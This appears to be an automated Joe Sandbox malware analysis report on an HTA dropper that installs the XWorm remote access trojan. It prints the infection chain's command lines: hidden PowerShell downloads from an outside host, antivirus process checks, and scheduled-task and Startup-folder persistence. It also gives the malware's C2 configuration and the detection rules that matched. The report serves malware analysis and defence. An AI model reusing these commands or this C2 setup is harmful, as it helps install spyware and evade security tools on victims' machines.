Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c2.hta

Overview

General Information

Sample name:c2.hta
Analysis ID:1573971
MD5:3b3967433fe77e5b709e469d9635d707
SHA1:21dfe527565c8d9c766458a48634b2d633e59076
SHA256:bb4f26feac9120fd5104e555331bc9fbbab35a1b2874d61c241397dad73284a8
Tags:htauser-abuse_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: PowerShell Web Download
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7864 cmdline: mshta.exe "C:\Users\user\Desktop\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 8132 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8184 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • Acrobat.exe (PID: 7692 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 2396 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 6720 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2052 --field-trial-handle=1648,i,6467156151985402777,10202988688681388531,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • powershell.exe (PID: 964 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • powershell.exe (PID: 8412 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • msword.exe (PID: 8672 cmdline: msword.exe MD5: C744E054E4EF01832BBF43B81D397B61)
        • cmd.exe (PID: 8932 cmdline: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 8984 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 8992 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • tasklist.exe (PID: 9028 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 9036 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 9076 cmdline: cmd /c md 220239 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • findstr.exe (PID: 9092 cmdline: findstr /V "DimPieLilHot" Statistical MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 9108 cmdline: cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Carter.pif (PID: 9124 cmdline: Carter.pif F MD5: 18CE19B57F43CE0A5AF149C96AECC685)
            • cmd.exe (PID: 9160 cmdline: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 9168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 9208 cmdline: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
            • cmd.exe (PID: 5032 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • RegAsm.exe (PID: 8756 cmdline: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • choice.exe (PID: 9140 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • cmd.exe (PID: 8820 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 8904 cmdline: timeout /t 90 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • wscript.exe (PID: 8252 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • DanielPulse.scr (PID: 8324 cmdline: "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • wscript.exe (PID: 1372 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["me-work.com"], "Port": 7007, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xa570:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xa60d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xa722:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x9f4c:$cnc4: POST / HTTP/1.1
    0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x8e70:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x13ce0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8f0d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x13d7d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x9022:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x13e92:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x884c:$cnc4: POST / HTTP/1.1
      • 0x136bc:$cnc4: POST / HTTP/1.1
      00000029.00000002.3850092334.0000000000D52000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 16 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        29.3.Carter.pif.38bceb0.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
          29.3.Carter.pif.38bceb0.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x8218:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x82b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x83ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x7bf4:$cnc4: POST / HTTP/1.1
          29.3.Carter.pif.38bceb0.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
            29.3.Carter.pif.38bceb0.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              29.3.Carter.pif.38bceb0.0.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xa018:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xa0b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xa1ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x99f4:$cnc4: POST / HTTP/1.1
              Click to see the 12 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
              Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ParentCommandLine: Carter.pif F, ParentImage: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentProcessId: 9124, ParentProcessName: Carter.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ProcessId: 8756, ProcessName: RegAsm.exe
              Sigma detected: Legitimate Application Dropped Script
              Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 7864, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\c[1].bat
              Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 9160, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ProcessId: 9208, ProcessName: schtasks.exe
              Sigma detected: Suspicious Invoke-WebRequest Execution
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8132, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 8184, ProcessName: powershell.exe
              Sigma detected: Suspicious MSHTA Child Process
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7864, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ProcessId: 8132, ProcessName: cmd.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8132, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 8184, ProcessName: powershell.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", ProcessId: 8252, ProcessName: wscript.exe
              Sigma detected: Execution of Suspicious File Type Extension
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Carter.pif F, CommandLine: Carter.pif F, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8932, ParentProcessName: cmd.exe, ProcessCommandLine: Carter.pif F, ProcessId: 9124, ProcessName: Carter.pif
              Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ParentCommandLine: Carter.pif F, ParentImage: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentProcessId: 9124, ParentProcessName: Carter.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ProcessId: 8756, ProcessName: RegAsm.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8132, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 8184, ProcessName: powershell.exe
              Sigma detected: SCR File Write Event
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ProcessId: 9124, TargetFilename: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
              Sigma detected: Suspicious Copy From or To System Directory
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: msword.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msword\msword.exe, ParentProcessId: 8672, ParentProcessName: msword.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ProcessId: 8932, ProcessName: cmd.exe
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 9160, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ProcessId: 9208, ProcessName: schtasks.exe
              Sigma detected: Suspicious Screensaver Binary File Creation
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ProcessId: 9124, TargetFilename: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8132, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 8184, ProcessName: powershell.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", ProcessId: 8252, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
